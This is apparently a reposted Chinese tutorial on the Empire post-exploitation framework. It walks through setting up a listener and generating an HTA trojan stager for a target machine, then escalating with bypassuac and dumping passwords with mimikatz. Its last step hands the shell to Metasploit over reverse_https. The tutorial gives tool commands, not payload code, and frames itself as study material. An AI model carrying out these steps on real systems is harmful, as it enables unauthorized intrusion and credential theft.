后渗透工具Empire使用教程

摘要:
Empire实现了无需powershell.exe就可运行PowerShell代理的功能。˃info#查看需要配置的参数信息(Empire:stager/windows/hta˃execute#执行生成木马将代码保存为hta文件,放到服务器上。在目标机器上访问运行命令后,我们回到我们的机器可以看到已经获取到了客户端的一个会话˃agents#查看获取的代理会话一个会话已经建立完成。

一、前言

Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中

二、empire使用详解

1.Empire 的安装

git clone https://github.com/EmpireProject/Empire.git

unzip Empire-master.zip

cd Empire-master

cd setup/

./install.sh

(最后输入数据库密码)

2.设置监听

cd Empire-master

./empire

后渗透工具Empire使用教程第1张

(Empire) > help #主菜单帮助命令

后渗透工具Empire使用教程第2张

(Empire) > listeners #查看本地监听代理地址,现在还没有会话代理,所以为空

后渗透工具Empire使用教程第3张

进入后需要使用监听种类,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,这里我们使用 http

后渗透工具Empire使用教程第4张

(Empire: listeners) > info #列出详细信息

后渗透工具Empire使用教程第5张

(Empire: listeners) > set Name bk #设置Name为bk

(Empire: listeners) > execute #执行命令,这条命令将其name设置生效

后渗透工具Empire使用教程第6张

至此,监听工作完成。我们开始配置生成后门。

3、生成木马

设置好监听后通过 back 命令返回上一级,然后使用 usestager 命令来指定生成木马的类型,通过空格加两下 tab 可查看所有生成文件的类型,这里我们使用 windows/hta,即 windows 平台下的 hta文件,同样,通过 info 查看此模块的详细信息。

(Empire: listeners/http) > back #返回上层模块

后渗透工具Empire使用教程第7张

(Empire: listeners/http) > usestager #空格加两下tab

后渗透工具Empire使用教程第8张

生成的文件类型大体有三类,multi 开头的是通用类,osx 开头即 mac 使用,windows 即 win 平台使用。

(Empire: listeners) > usestager windows/launcher_bat bk # 选择木马种类

后渗透工具Empire使用教程第9张

这里选择的是hta类型的脚本,当然也可以选择其他的。后面的bk就是刚刚设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。

(Empire: stager/windows/launcher_bat) > info #查看需要配置的参数信息

后渗透工具Empire使用教程第10张

(Empire: stager/windows/hta > execute #执行生成木马

后渗透工具Empire使用教程第11张

将代码保存为hta文件,放到服务器上。

后渗透工具Empire使用教程第12张

在目标机器上访问

后渗透工具Empire使用教程第13张

运行命令后,我们回到我们的机器可以看到已经获取到了客户端的一个会话

后渗透工具Empire使用教程第14张

(Empire: stager/windows/launcher_bat) > agents #查看获取的代理会话

后渗透工具Empire使用教程第15张

一个会话已经建立完成。

(Empire: agents) > rename DPFXWKY9 win10 #更改会话名字

后渗透工具Empire使用教程第16张

(Empire: agents) > interact win10 #和该会话交互

后渗透工具Empire使用教程第17张

我们通过 help 可查看一些命令和一些提供的内网渗透常用的工具

后渗透工具Empire使用教程第18张

4、提权

如果想执行 windows 系统自带的命令,可以通过 shell 加命令的格式,例如查看当前 shell 的权限,我们输入 shell whoami /groups,返回了 medium 即非高权限,如下图:

后渗透工具Empire使用教程第19张

非高权限的话,很多命令使用会有限制,例如 mimikatz,所以下面需要提升权限,这里我们使用 bypassuac,首先 empire 提供了很多使用模块,这里我们通过 usemodule 空格加两下 tab 可查看全部模块,有二百多个,如下图:

后渗透工具Empire使用教程第20张

bypassuac 提权我们使用 usemodule privesc/bypassuac 这个模块,然后 info 查看其信息,如下图:

后渗透工具Empire使用教程第21张

这里我们需要设置的参数还是 Listener,即监听的名称,这里是 bk,如下图:

后渗透工具Empire使用教程第22张

设置后通过 execute 执行,成功后会返回一个新的 shell

后渗透工具Empire使用教程第23张

随后我们通过 agents 查看已有的 shell,username 前带 * 号的就是高权限已经提权成功的 shell。

后渗透工具Empire使用教程第24张

这时 mimikatz 已可以使用,输入 mimikatz 来获取目标账号密码,如下图:

后渗透工具Empire使用教程第25张

通过 mimikatz 获取后,若在内网机器较多,为了查看方便,我们可以通过 creds 命令来直接列出其密码,如下图:

后渗透工具Empire使用教程第26张

5、反弹shell给msf

empire 若需要结合 msf 使用,则可以将得到的 shell 反给 msf,使用模块 code_execution/invoke_shellcode,info 信息如下:

后渗透工具Empire使用教程第27张

这里需要设置下Lhost 和Lport,Lhost 即 msf 所在机器的 ip,Lport 即 msf 监听反弹 shell 的端口,还有一个参数注意下,就是payload,默认值是 reverse_https,这个不用改,我们 msf 设置监听时 payload 需要和其一致,也需要设置成 reverse_https,设置后我们先不执行 execute 命令,先把 msf 监听设置好:

后渗透工具Empire使用教程第28张

msf 的 payload 设置为 windows/meterpreter/reverse_https,Lhost 为本机所在的 ip,Lport 端口和刚才 empire 设置的一样,这里是 4444,然后 exploit 执行监听,这时返回 empire 执行 execute,停一会会看到 msf 已经收到了 shell,如下图:

后渗透工具Empire使用教程第29张

返回 shell 后,我们可以执行 whoami /groups 看下权限,可以看到返回的是高权限的 shell,如下图:

后渗透工具Empire使用教程第30张

免责声明:文章转载自《后渗透工具Empire使用教程》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇android 拍照上传照片MySQL服务器端&客户端常见错误下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

Linux使用Shell在线语音播报功能

在文件夹中创建一个sh文件,内容如下: #!/bin/bash say() { #mplayer -really-quiet "http://tts.baidu.com/text2audio?lan=zh&ie=UTF-8&spd=5&text=$*"; #mpg321 -q "http://tts.baidu....

《Linux命令行与shell脚本编程大全》第二十五章 创建与数据库、web及电子邮件相关的脚本

25.1 MySQL数据库 /* 但是我在虚拟机上安装的时候居然不提示输入密码。 这个可以参考http://blog.csdn.net/sinat_21302587/article/details/76870457 导致登录的时候不知道账号密码。 默认的账号密码在 /etc/mysql/debian.cnf上。如下图,user和password就是账号密码...

用adb命令组装PowerShell实用小工具——Android测试小助手

[本文出自天外归云的博客园] 简介 APP性能测试一般对以下几个方面进行测试: 1.启动时间(可以通过本工具测试); 2.CPU的占用(可以通过本工具测试); 3.内存的占用(可以通过本工具测试); 4.流量的耗用(可以通过本工具测试); 5.电量的耗用(用户实际使用中感知即可)。 除了可以做以上这几个专项测试外,本工具还能进行monkey测试等等。 可...

windows下练习linux shell

<---开始学习linux---记录一下---路漫漫其修远兮---加油吧---萌萌达> 使用软件:Cygwin  下载地址(免安装版):链接: http://pan.baidu.com/s/1jG6PjEY  密码: vyjs 解压到任意的位置,博主是放在 E:devcygwin 运行bash.exe: 1.直接在bin目录中运行bash.ex...

编写通用shell脚本启动java项目,适用于多数服务,只需修改服务名即可

文件名:service-user.sh 文件内容: ##shell脚本的头文件必须有#!/bin/sh ##再次配置java环境变量以防报其他错误## java env#jdk安装目录export JAVA_HOME=/usr/java/jdk1.8.0_144export JRE_HOME=$JAVA_HOME/jre ## service nameAP...

shell调试技术

一. 前言 shell编程在unix/linux世界中使用得非常广泛,熟练掌握shell编程也是成为一名优秀的unix/linux开发者和系统管理员的必经之路。脚本调试的主要工作就是发现引发脚本错误的原因以及在脚本源代码中定位发生错误的行,常用的手段包括分析输出的错误信息,通过在脚本中加入调试语句,输出调试信息来辅助诊断错误,利用调试工具等。但与其它高级语...